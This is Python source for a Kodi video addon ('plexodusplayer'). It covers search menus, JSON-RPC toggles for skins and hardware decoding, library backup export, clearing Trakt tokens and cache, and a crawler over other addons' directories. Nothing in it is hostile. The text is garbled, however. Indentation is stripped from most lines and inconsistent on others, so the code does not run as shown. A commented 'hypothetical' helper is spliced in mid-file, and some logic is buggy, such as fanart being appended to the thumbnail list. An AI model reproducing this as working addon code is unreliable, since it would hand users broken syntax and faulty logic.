dialogs.notify(msg="{0}: {1} {2}".format(_('Music'), _('Configure'), _("Library").lower()), title=_('Done'), delay=1000, image=get_icon_path("music"))
except: dialogs.notify(msg="{0}: {1} {2}".format(_("Music"), _('Configure'), _("Library").lower()), title=_('Failed for %s') % _('Music'), delay=1000, image=get_icon_path("music"))
livelibraryfolder = plugin.get_setting(SETTING_LIVE_LIBRARY_FOLDER, unicode)
try:
meta.library.live.auto_live_setup(livelibraryfolder)
dialogs.notify(msg="{0}: {1} {2}".format(_('TV'), _('Configure'), _("Library").lower()), title=_('Done'), delay=1000, image=get_icon_path("live"))
except: dialogs.notify(msg="{0}: {1} {2}".format(_('TV'), _('Configure'), _("Library").lower()), title=_('Failed for %s') % _('TV'), delay=1000, image=get_icon_path("live"))
return True
@plugin.route('/search')
def root_search():
term = plugin.keyboard(heading=_("Enter search string"))
if term != None and term != "": return root_search_term(term)
else: return
@plugin.route('/search/edit/<term>')
def root_search_edit(term):
term = plugin.keyboard(default=term, heading=_("Enter search string"))
if term != None and term != "": return root_search_term(term)
else: return
@plugin.route('/search_term/<term>', options = {"term": "None"})
def root_search_term(term):
items = [
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("Movies"), "TMDb"),
'path': plugin.url_for("tmdb_movies_search_term", term=term, page='1'),
'icon': get_icon_path("movies"),
'thumbnail': get_icon_path("movies"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("Movies"), "Trakt"),
'path': plugin.url_for("trakt_movies_search_term", term=term, page='1'),
'icon': get_icon_path("movies"),
'thumbnail': get_icon_path("movies"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("TV shows"), "TMDb"),
'path': plugin.url_for("tmdb_tv_search_term", term=term, page='1'),
'icon': get_icon_path("tv"),
'thumbnail': get_icon_path("tv"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("TV shows"), "Trakt"),
'path': plugin.url_for("trakt_tv_search_term", term=term, page='1'),
'icon': get_icon_path("tv"),
'thumbnail': get_icon_path("tv"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("TV shows"), "TVDb"),
'path': plugin.url_for("tvdb_tv_search_term", term=term, page='1'),
'icon': get_icon_path("tv"),
'thumbnail': get_icon_path("tv"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("Albums"), "LastFM"),
'path': plugin.url_for("music_search_album_term", term=term, page='1'),
'icon': get_icon_path("music"),
'thumbnail': get_icon_path("music"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("Artists"), "LastFM"),
'path': plugin.url_for("music_search_artist_term", term=term, page='1'),
'icon': get_icon_path("music"),
'thumbnail': get_icon_path("music"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("Tracks"), "LastFM"),
'path': plugin.url_for("music_search_track_term", term=term, page='1'),
'icon': get_icon_path("music"),
'thumbnail': get_icon_path("music"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("Channels"), "Live addons"),
'path': plugin.url_for("live_search_term", term=term),
'icon': get_icon_path("live"),
'thumbnail': get_icon_path("live"),
},
{
'label': "{0}: '{1}' - {2} ({3})".format(_("Search"), term, _("Playlists"), "Trakt"),
'path': plugin.url_for("lists_search_for_lists_term", term=term, page='1'),
'icon': get_icon_path("lists"),
'thumbnail': get_icon_path("lists"),
},
{
'label': "{0}: '{1}' ({2})".format(_("Search"), term, plugin.addon.getAddonInfo('name')),
'path': plugin.url_for("root_search_term", term=term, page='1'),
'icon': get_icon_path("search"),
'thumbnail': get_icon_path("search"),
},
{
'label': "{0} {1}".format(_("Edit"), _("Search string").lower()),
'path': plugin.url_for("root_search_edit", term=term),
'icon': get_icon_path("search"),
'thumbnail': get_icon_path("search"),
},
]
for item in items:
item['properties'] = {'fanart_image' : get_background_path()}
return items
@plugin.route('/toggle/preferred_toggle')
def toggle_preferred_toggle():
if xbmc.getCondVisibility("Skin.HasSetting(Toggling)") != True: dialogs.notify(msg="Toggling", title="Switched on", delay=5000, image=get_icon_path("metalliq"))
else: dialogs.notify(msg="Toggling", title="Switched off", delay=5000, image=get_icon_path("metalliq"))
xbmc.executebuiltin("Skin.ToggleSetting(Toggling)")
@plugin.route('/toggle/context_player')
def toggle_context_player():
if xbmc.getCondVisibility("Skin.HasSetting(Contexting)") != True: dialogs.notify(msg="Context player", title="Switched off", delay=5000, image=get_icon_path("metalliq"))
else: dialogs.notify(msg="Context player", title="Switched on", delay=5000, image=get_icon_path("metalliq"))
xbmc.executebuiltin("Skin.ToggleSetting(Contexting)")
@plugin.route('/toggle/acceleration')
def toggle_hardware_acceleration():
if xbmc.getCondVisibility("System.Platform.Android") == 1:
if xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.useamcodec"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":true}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.useamcodec","value":false}, "id":1}')
elif xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.useamcodec"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":false}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.useamcodec","value":true}, "id":1}')
else: pass
if xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usestagefright"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":true}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usestagefright","value":false}, "id":1}')
elif xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usestagefright"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":false}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usestagefright","value":true}, "id":1}')
else: pass
if xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usemediacodec"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":true}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usemediacodec","value":false}, "id":1}')
elif xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usemediacodec"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":false}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usemediacodec","value":true}, "id":1}')
else: pass
if xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usemediacodecsurface"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":true}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usemediacodecsurface","value":false}, "id":1}')
elif xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usemediacodecsurface"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":false}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usemediacodecsurface","value":true}, "id":1}')
else: pass
if xbmc.getCondVisibility("System.Platform.Linux.RaspberryPi") == 1:
if xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.useomxplayer"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":true}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.useomxplayer","value":false}, "id":1}')
elif xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.useomxplayer"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":false}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.useomxplayer","value":true}, "id":1}')
else: pass
if xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usemmal"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":true}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usemmal","value":false}, "id":1}')
elif xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usemmal"}, "id":1}') == '{"id":1,"jsonrpc":"2.0","result":{"value":false}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usemmal","value":true}, "id":1}')
else: pass
if xbmc.getCondVisibility("System.Platform.Windows") == 1:
        response = xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"videoplayer.usedxva2"}, "id":1}')
        if response == '{"id":1,"jsonrpc":"2.0","result":{"value":true}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usedxva2","value":false}, "id":1}')
        elif response == '{"id":1,"jsonrpc":"2.0","result":{"value":false}}': xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"videoplayer.usedxva2","value":true}, "id":1}')
else: pass
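# The branches above all repeat one JSON-RPC round trip per setting. A
# sketch of the same pattern factored into a helper (hypothetical name; the
# addon itself inlines the calls):
def _toggle_bool_setting(setting):
    query = '{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"%s"}, "id":1}' % setting
    current = xbmc.executeJSONRPC(query)
    if current == '{"id":1,"jsonrpc":"2.0","result":{"value":true}}': new_value = "false"
    elif current == '{"id":1,"jsonrpc":"2.0","result":{"value":false}}': new_value = "true"
    else: return
    xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"%s","value":%s}, "id":1}' % (setting, new_value))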
@plugin.route('/toggle/skin')
def toggle_between_skins():
if xbmc.getCondVisibility("Skin.HasSetting(Contexting)") != True: contexting = False
else: contexting = True
if xbmc.getCondVisibility("Skin.HasSetting(Toggling)") != True: toggling = False
else: toggling = True
current_skin = str(xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.GetSettingValue","params":{"setting":"lookandfeel.skin"}, "id":1}')).replace('{"id":1,"jsonrpc":"2.0","result":{"value":"','').replace('"}}','')
primary_skin = plugin.get_setting(SETTING_PRIMARY_SKIN, unicode)
if primary_skin == "": plugin.set_setting(SETTING_PRIMARY_SKIN, current_skin)
alternate_skin = plugin.get_setting(SETTING_ALTERNATE_SKIN, unicode)
if alternate_skin == "":
if primary_skin != "skin.confluence" and primary_skin != "": plugin.set_setting(SETTING_ALTERNATE_SKIN, "skin.confluence")
else:
dialogs.notify(msg="Alternate skin", title="Not set", delay=5000, image=get_icon_path("metalliq"))
return openSettings(addonid, 5.7)
if primary_skin != alternate_skin and primary_skin != "" and alternate_skin != "" and xbmc.getCondVisibility('System.HasAddon(%s)' % primary_skin) and xbmc.getCondVisibility('System.HasAddon(%s)' % alternate_skin):
if current_skin != primary_skin:
xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"lookandfeel.skin","value":"%s"}, "id":1}' % primary_skin)
xbmc.executebuiltin('SetFocus(11)')
xbmc.executebuiltin('Action(Select)')
else:
xbmc.executeJSONRPC('{"jsonrpc":"2.0", "method":"Settings.SetSettingValue","params":{"setting":"lookandfeel.skin","value":"%s"}, "id":1}' % alternate_skin)
xbmc.executebuiltin('SetFocus(11)')
xbmc.executebuiltin('Action(Select)')
xbmc.sleep(2000)
if contexting == False and xbmc.getCondVisibility("Skin.HasSetting(Contexting)") == True: toggle_context_player()
elif contexting == True and xbmc.getCondVisibility("Skin.HasSetting(Contexting)") == False: toggle_context_player()
else: pass
if toggling == False and xbmc.getCondVisibility("Skin.HasSetting(Toggling)") == True: toggle_preferred_toggle()
elif toggling == True and xbmc.getCondVisibility("Skin.HasSetting(Toggling)") == False: toggle_preferred_toggle()
else: pass
@plugin.route('/export')
def export_library():
export_movies_library()
export_tv_library()
@plugin.route('/export/movies')
def export_movies_library():
folder_path = plugin.get_setting(SETTING_MOVIES_LIBRARY_FOLDER, unicode)
if not xbmcvfs.exists(folder_path): return dialogs.notify(msg='Movies folder', title='Absent', delay=5000, image=get_icon_path("movies"))
ids = ""
movies = xbmcvfs.listdir(folder_path)[0]
if len(movies) < 1: return dialogs.notify(msg='Movies folder', title='Empty', delay=5000, image=get_icon_path("movies"))
    else:
for movie in movies: ids = ids + str(movie) + '\n'
movies_backup_file_path = "special://profile/addon_data/plugin.video.plexodusplayer/movies_to_add.bak"
if xbmcvfs.exists(movies_backup_file_path): os.remove(xbmc.translatePath(movies_backup_file_path))
if not xbmcvfs.exists(movies_backup_file_path):
batch_add_file = xbmcvfs.File(movies_backup_file_path, 'w')
batch_add_file.write(ids)
batch_add_file.close()
dialogs.notify(msg="Movies", title="Backed up", delay=5000, image=get_icon_path("movies"))
@plugin.route('/export/tv')
def export_tv_library():
folder_path = plugin.get_setting(SETTING_TV_LIBRARY_FOLDER, unicode)
if not xbmcvfs.exists(folder_path): return dialogs.notify(msg='TVShows folder', title='Absent', delay=5000, image=get_icon_path("tv"))
ids = ""
shows = xbmcvfs.listdir(folder_path)[0]
if len(shows) < 1: return dialogs.notify(msg='TVShows folder', title='Empty', delay=5000, image=get_icon_path("tv"))
    else:
for show in shows: ids = ids + str(show) + '\n'
shows_backup_file_path = "special://profile/addon_data/plugin.video.plexodusplayer/shows_to_add.bak"
if xbmcvfs.exists(shows_backup_file_path): os.remove(xbmc.translatePath(shows_backup_file_path))
if not xbmcvfs.exists(shows_backup_file_path):
batch_add_file = xbmcvfs.File(shows_backup_file_path, 'w')
batch_add_file.write(ids)
batch_add_file.close()
dialogs.notify(msg="TVShows", title="Backed up", delay=5000, image=get_icon_path("tv"))
@plugin.route('/play/<label>')
def play_by_label(label):
types = [_("Movies"), _("TV shows"), _("Channels")]
selection = dialogs.select("{0} {1}".format(_("Choose"), _("Type").lower()), [item for item in types])
if selection == 0: xbmc.executebuiltin("RunPlugin(plugin://plugin.video.plexodusplayer/movies/play_by_name/{0}/en)".format(label))
elif selection == 1: xbmc.executebuiltin("RunPlugin(plugin://plugin.video.plexodusplayer/tv/play_by_name_only/{0}/en)".format(label))
elif selection == 2: xbmc.executebuiltin("RunPlugin(plugin://plugin.video.plexodusplayer/live/{0}/None/en/context)".format(label))
@plugin.route('/cleartrakt')
def clear_trakt():
msg = "{0} {1} {2}?".format(_("Remove"), "Trakt", _("Settings").lower())
if dialogs.yesno("{0} {1}".format(_("Unlock"), "Trakt"), msg):
plugin.set_setting(SETTING_TRAKT_ACCESS_TOKEN, "")
plugin.set_setting(SETTING_TRAKT_REFRESH_TOKEN, "")
plugin.set_setting(SETTING_TRAKT_EXPIRES_AT, "")
@plugin.route('/cleartraktcache')
def clear_trakt_cache():
    for filename in os.listdir(plugin.storage_path):
        if filename == "trakt":
            file_path = os.path.join(plugin.storage_path, filename)
            try:
                if os.path.isfile(file_path): os.unlink(file_path)
                elif os.path.isdir(file_path): shutil.rmtree(file_path)
            except Exception, e: traceback.print_exc()
@plugin.route('/printjson/<path>')
def printjson(path):
response = RPC.files.get_directory(media="files", directory="plugin://plugin.video.crackler/?foldername=Movies&mode=movies_folder", properties=["title","artist","albumartist","genre","year","rating","album","track","duration","comment","lyrics","musicbrainztrackid","musicbrainzartistid","musicbrainzalbumid","musicbrainzalbumartistid","playcount","fanart","director","trailer","tagline","plot","plotoutline","originaltitle","lastplayed","writer","studio","mpaa","cast","country","imdbnumber","premiered","productioncode","runtime","set","showlink","streamdetails","top250","votes","firstaired","season","episode","showtitle","thumbnail","file","resume","artistid","albumid","tvshowid","setid","watchedepisodes","disc","tag","art","genreid","displayartist","albumartistid","description","theme","mood","style","albumlabel","sorttitle","episodeguide","uniqueid","dateadded","size","lastmodified","mimetype"])
xbmc.log("QQQQQ plugin://%s = %s" % (path.replace("%2f", "/"), str(response)))
@plugin.route('/mapall')
def mapall():
exclusions = ["plugin.audio.dradio","plugin.audio.mixcloud","plugin.image.dilbert","plugin.video.chefkoch_de","plugin.video.goldpagemedia","plugin.video.youtube","plugin.audio.booksshouldbefree","plugin.audio.jambmc","plugin.video.7tv",]
dones = ["plugin.audio.abradio.cz","plugin.audio.cherrymusic","plugin.audio.deejayIt.reloaded","plugin.audio.detektorfm","plugin.audio.di.fm","plugin.audio.diyfm","plugin.audio.dr.dk.netradio","plugin.audio.groove","plugin.audio.hongkongradio","plugin.audio.icecast","plugin.audio.internet.archive","plugin.audio.jazzradio.com","plugin.audio.listenliveeu","plugin.audio.modland","plugin.audio.mozart","plugin.audio.nectarine","plugin.audio.npr","plugin.audio.podcatcher","plugin.audio.qobuz","plugin.audio.radioma","plugin.audio.radiotunes.com","plugin.audio.radio_de","plugin.audio.rainymood.com","plugin.audio.ramfm","plugin.audio.rautemusik","plugin.audio.rdio","plugin.audio.releasefm","plugin.audio.relive","plugin.audio.shoutcast","plugin.audio.rockradio.com","plugin.audio.sgradio",]
audio_addons = ["plugin.audio.abcradionational", "plugin.audio.abradio.cz", "plugin.audio.booksshouldbefree", "plugin.audio.cherrymusic", "plugin.audio.deejayIt.reloaded", "plugin.audio.detektorfm", "plugin.audio.di.fm", "plugin.audio.diyfm", "plugin.audio.dr.dk.netradio", "plugin.audio.dradio", "plugin.audio.groove", "plugin.audio.hongkongradio", "plugin.audio.icecast", "plugin.audio.internet.archive", "plugin.audio.jambmc", "plugin.audio.jazzradio.com", "plugin.audio.listenliveeu", "plugin.audio.mixcloud", "plugin.audio.modland", "plugin.audio.mozart", "plugin.audio.nectarine", "plugin.audio.npr", "plugin.audio.podcatcher", "plugin.audio.qobuz", "plugin.audio.radioma", "plugin.audio.radiotunes.com", "plugin.audio.radio_de", "plugin.audio.rainymood.com", "plugin.audio.ramfm", "plugin.audio.rautemusik", "plugin.audio.rdio", "plugin.audio.releasefm", "plugin.audio.relive", "plugin.audio.resetradio", "plugin.audio.rne", "plugin.audio.rockradio.com", "plugin.audio.sgradio", "plugin.audio.shoutcast", "plugin.audio.somafm", "plugin.audio.soundcloud", "plugin.audio.sverigesradio", "plugin.audio.tilos", "plugin.audio.tripler", "plugin.audio.vgpodcasts", "plugin.audio.wimp"]
misc_addons = ["plugin.dbmc", "plugin.onedrive", "plugin.picture.bromix.break", "plugin.program.isybrowse", "plugin.program.jdownloader", "plugin.program.mceremote", "plugin.program.newgrounds", "plugin.program.rpcalendar", "plugin.program.super.favourites", "plugin.program.tvhighlights", "plugin.program.utorrent", "plugin.program.video.node.editor", "plugin.program.wienerlinien", "plugin.programm.xbmcmail"]
image_addons = ["plugin.image.500px", "plugin.image.cheezburger_network", "plugin.image.cyanidehappiness", "plugin.image.dilbert", "plugin.image.flickr", "plugin.image.garfield", "plugin.image.google", "plugin.image.iphoto", "plugin.image.jpfoto", "plugin.image.moebooru", "plugin.image.xkcd", "plugin.image.xzen"]
video_addons_take_too_long = ["plugin.video.clipfish.de", "plugin.video.7tv", "plugin.video.ardmediathek_de", "plugin.video.7tv", "plugin.video.ardmediathek_de", "plugin.video.comingsoon.it", "plugin.video.corbettreport", "plugin.video.espn_3", ]
video_addons_exclusions = ["plugin.video.docu", ]
video_addons_done = ["plugin.video.3bmeteo", "plugin.video.4players", "plugin.video.9gagtv", "plugin.video.abcradionational", "plugin.video.amaproracing", "plugin.video.ansa", "plugin.video.arretsurimages", "plugin.video.arteplussept", "plugin.video.arte_tv", "plugin.video.attactv", "plugin.video.borsentv.dk", "plugin.video.botchamania", "plugin.video.br3", "plugin.video.break_com", "plugin.video.btbn", "plugin.video.cessfull", "plugin.video.cnet.podcasts", "plugin.video.codigofacilito.com", "plugin.video.collegehumor", "plugin.video.comicvine", "plugin.video.confreaks", "plugin.video.corrieretv", "plugin.video.couchpotato_manager", "plugin.video.crackler", "plugin.video.creationtoday_org", "plugin.video.crunchyroll-takeout", "plugin.video.d17", "plugin.video.d8", "plugin.video.deredactie", "plugin.video.disclose_tv", "plugin.video.disneychannel_de", "plugin.video.dmax", "plugin.video.dmax_de", "plugin.video.dmi.dk", "plugin.video.dokumonster", "plugin.video.dr.dk.bonanza", "plugin.video.dr.dk.live", "plugin.video.dr.dk.podcast", "plugin.video.drnu", "plugin.video.dumpert", "plugin.video.dzango.tv", "plugin.video.earthtouch", "plugin.video.eevblog", "plugin.video.ekkofilm.dk", "plugin.video.elisa.viihde", "plugin.video.engadget", "plugin.video.enigmatv", "plugin.video.eredivisie-live", "plugin.video.esa", "plugin.video.eso", ]
video_addons = ["plugin.video.crackler"]
video_addonsb = ["plugin.video.eyetv.parser", "plugin.video.fattoquotidianotv", "plugin.video.fernsehkritik", "plugin.video.filmarkivet", "plugin.video.filmsforaction", "plugin.video.floptv", "plugin.video.focus-online.de", "plugin.video.fox.news", "plugin.video.gaffa.tv", "plugin.video.gamegurumania", "plugin.video.gamestar", "plugin.video.geekandsundry", "plugin.video.gfq", "plugin.video.giantbomb", "plugin.video.glwiz", "plugin.video.godtube_com", "plugin.video.goldpagemedia", "plugin.video.golem.de", "plugin.video.gq", "plugin.video.greenpeace", "plugin.video.gronkh.de", "plugin.video.guardian", "plugin.video.hallmark", "plugin.video.hdtrailers_net", "plugin.video.heritagechannel", "plugin.video.hgtv", "plugin.video.hgtv.canada", "plugin.video.hollywoodreporter", "plugin.video.ign_com", "plugin.video.ilmeteo", "plugin.video.infowars", "plugin.video.iplayerwww", "plugin.video.irishtv", "plugin.video.itbn_org", "plugin.video.itunes_podcasts", "plugin.video.jeuxvideo.com", "plugin.video.johnlocker", "plugin.video.jupiterbroadcasting", "plugin.video.jwtv-unofficial", "plugin.video.khanacademy", "plugin.video.kino.dk", "plugin.video.kordkutters", "plugin.video.lachschon_de", "plugin.video.lacosa", "plugin.video.latelelibre_fr", "plugin.video.livestream", "plugin.video.manoto", "plugin.video.massengeschmack", "plugin.video.media-ccc-de", "plugin.video.mediacorp", "plugin.video.metacafe", "plugin.video.plexodusplayer", "plugin.video.metalvideo", "plugin.video.mk", "plugin.video.mlg.tv", "plugin.video.mms", "plugin.video.moontv.fi", "plugin.video.mtv.it", "plugin.video.mtv_de", "plugin.video.musicvideojukebox_net", "plugin.video.mycanal", "plugin.video.mytv_bg", "plugin.video.myvevo", "plugin.video.myvideo_de", "plugin.video.nasa", "plugin.video.nbcsnliveextra", "plugin.video.nederland24", "plugin.video.netzkino_de", "plugin.video.nfl-teams", "plugin.video.nfl.com", "plugin.video.nfl.gamepass", "plugin.video.nhl-gamecenter-live", "plugin.video.nick_de", "plugin.video.nlhardwareinfo", "plugin.video.noco", "plugin.video.nolife", "plugin.video.nos", "plugin.video.npr", "plugin.video.nrk", "plugin.video.nrwision", "plugin.video.nytimes", "plugin.video.on_aol", "plugin.video.orftvthek", "plugin.video.oxygen", "plugin.video.pcloud-video-streaming", "plugin.video.photocasts", "plugin.video.pinkbike", "plugin.video.pixel.tv", "plugin.video.popcornflix", "plugin.video.popcorntv", "plugin.video.powerunlimited", "plugin.video.previewnetworks", "plugin.video.puls4", "plugin.video.putio", "plugin.video.radbox", "plugin.video.railscasts", "plugin.video.raitv", "plugin.video.realtimetvitalia", "plugin.video.reddit_tv", "plugin.video.retro_tv", "plugin.video.roosterteeth", "plugin.video.rt", "plugin.video.rtlxl", "plugin.video.rtpplay", "plugin.video.rts", "plugin.video.s04tv", "plugin.video.sagetv", "plugin.video.sapo", "plugin.video.sarpur", "plugin.video.schaetzederwelt", "plugin.video.science.friday", "plugin.video.serviziopubblico", "plugin.video.servustv_com", "plugin.video.sgtv", "plugin.video.si", "plugin.video.skytg24", "plugin.video.smithsonian", "plugin.video.snagfilms", "plugin.video.southpark_unofficial", "plugin.video.spiegel_tv", "plugin.video.sportube", "plugin.video.sprout", "plugin.video.spurs-tv", "plugin.video.srf_podcast_ch", "plugin.video.supertennis", "plugin.video.svtplay", "plugin.video.tagen.tv", "plugin.video.tagesschau", "plugin.video.tagesschauvideoblog", "plugin.video.ted.talks", "plugin.video.tekthing", "plugin.video.testtube", "plugin.video.theblaze", 
"plugin.video.thenewboston", "plugin.video.time_com", "plugin.video.tlc_de", "plugin.video.tmos", "plugin.video.toonjet", "plugin.video.trailer.addict", "plugin.video.trakt_list_manager", "plugin.video.travel", "plugin.video.tv2.dk", "plugin.video.tv2regionerne.dk", "plugin.video.tv3.cat", "plugin.video.tv3play.dk", "plugin.video.tvkc", "plugin.video.tvo", "plugin.video.tvokids", "plugin.video.tvvn", "plugin.video.tweakers", "plugin.video.twit", "plugin.video.udacity", "plugin.video.ukmvjb", "plugin.video.uzg", "plugin.video.vgtv", "plugin.video.videobash_com", "plugin.video.videovideo.dk", "plugin.video.viewster", "plugin.video.vimcasts", "plugin.video.vimeo", "plugin.video.vine", "plugin.video.virginradio.it", "plugin.video.vitaminl_tv", "plugin.video.voapersian", "plugin.video.vvvvid", "plugin.video.wabc", "plugin.video.watchmojo", "plugin.video.watson", "plugin.video.welt_der_wunder", "plugin.video.wimp", "plugin.video.wnbc", "plugin.video.worldstarhiphop", "plugin.video.wsj", "plugin.video.yogaglo", "plugin.video.youtube", "plugin.video.zattoobox", "plugin.video.zdf_de_lite", "plugin.video.zeemarathi", "plugin.video.zeetv"]
i = 0
for item in video_addons:
if xbmc.getCondVisibility("System.HasAddon(%s)" % item):
            itemthread = threading.Thread(target=test, args=(item, 2))
itemthread.start()
@plugin.route('/test/<id>/<maxdepth>')
def test(id, maxdepth):
try: maxdepth = int(maxdepth)
except: return
dialogs.notify(msg='MaxDepth = %d' % maxdepth, title='Id = %s' % id, delay=5000, image=get_icon_path("metalliq"))
import xbmcaddon
import re
from rpc import RPC
INFOTYPES = ["author", "changelog", "description", "disclaimer", "fanart", "icon", "id", "name", "path", "profile", "stars", "summary", "type", "version"]
ADDON = xbmcaddon.Addon(id)
addon_info_string = ""
for infotype in INFOTYPES:
addon_info_string += "# %-11s = %s\n" % (infotype, ADDON.getAddonInfo(infotype).replace("14.o\\portable_data\\",""))
base = u'plugin://{0}/'.format(id)
dirs_total = [u'plugin://{0}/'.format(id)]
dirs_done = [u'plugin://{0}/'.format(id)]
dirs_labels = [u'{0}'.format(re.sub(r'\[[^)].*?\]', '', ADDON.getAddonInfo("name")))]
dirs_thumbs = [u'{0}'.format(re.sub(r'\[[^)].*?\]', '', ADDON.getAddonInfo("icon")))]
dirs_backgr = [u'{0}'.format(re.sub(r'\[[^)].*?\]', '', ADDON.getAddonInfo("fanart")))]
streams = {}
depth = 0
file_labels = []
file_labels_raw = []
response = RPC.files.get_directory(media="files", directory=base, properties=["thumbnail","fanart","description","plot","art"])
if "files" in response:
files = response["files"]
links = {}
thumbnails = {}
backgrounds = {}
descriptions = {}
streams[base] = {}
for f in files:
if f["filetype"] == "directory":
if f["file"] not in dirs_total:
dirs_total.append(f["file"])
if f["thumbnail"]: dirs_thumbs.append(f["thumbnail"])
else: dirs_thumbs.append("")
if f["fanart"]: dirs_thumbs.append(f["fanart"])
else: dirs_backgr.append("")
label = re.sub(r'\[[^)].*?\]', '', f["label"])
dirs_labels.append(label)
if f["filetype"] == "file":
file_labels_raw.append(f["label"])
label = re.sub(r'\[[^)].*?\]', '', f["label"])
file = f["file"]
while (label in links):
label = "%s." % label
links[label] = file
if f["art"]: thumbnails[label] = f["art"]
elif f["thumbnail"]: thumbnails[label] = f["thumbnail"]
else: thumbnails[label] = ""
backgrounds[label] = f["fanart"]
if "description" in response: descriptions[label] = f["description"].replace(" ", "+").replace('"', '"').replace("'", "'").replace(",", "%2c")
elif "plot" in response: descriptions[label] = f["plot"].replace(" ", "+").replace('"', '"').replace("'", "'").replace(",", "%2c")
else: descriptions[label] = ""
file_labels.append(label)
elif not 'error' in response: pass
else: return
while len(dirs_total) > len(dirs_done) and depth != maxdepth:
depth = depth + 1
dialogs.notify(msg='Depth', title='%d' % depth, delay=5000, image=get_icon_path("metalliq"))
dirs = [x for x in dirs_total if x not in dirs_done and "search" not in x and "personal" not in x]
for d in dirs:
response = RPC.files.get_directory(media="files", directory=d, properties=["thumbnail","fanart","description","plot"])
dirs_done.append(d)
if "files" not in response: pass
elif not 'error' in response:
files = response["files"]
links = {}
thumbnails = {}
backgrounds = {}
descriptions = {}
streams[d] = {}
for f in files:
if f["filetype"] == "file":
if "/default" in f["file"]: pass
else:
file_labels_raw.append(f["label"])
label = re.sub(r'\[[^)].*?\]', '', f["label"])
label = label.strip(" ").replace("Stream - ", "").replace("stream - ", "")
file = f["file"]
while (label in links):
label = "%s.." % label
links[label] = file
if f["thumbnail"]: thumbnails[label] = f["thumbnail"]
else: thumbnails[label] = "http%3a%2f%2fmirrors.kodi.tv%2faddons%2fhelix%2f{0}%2ficon.png".format(ADDON.getAddonInfo("id"))
if f["fanart"]: backgrounds[label] = f["fanart"]
else: backgrounds[label] = "http%3a%2f%2fmirrors.kodi.tv%2faddons%2fhelix%2f{0}%2ffanart.jpg".format(ADDON.getAddonInfo("id"))
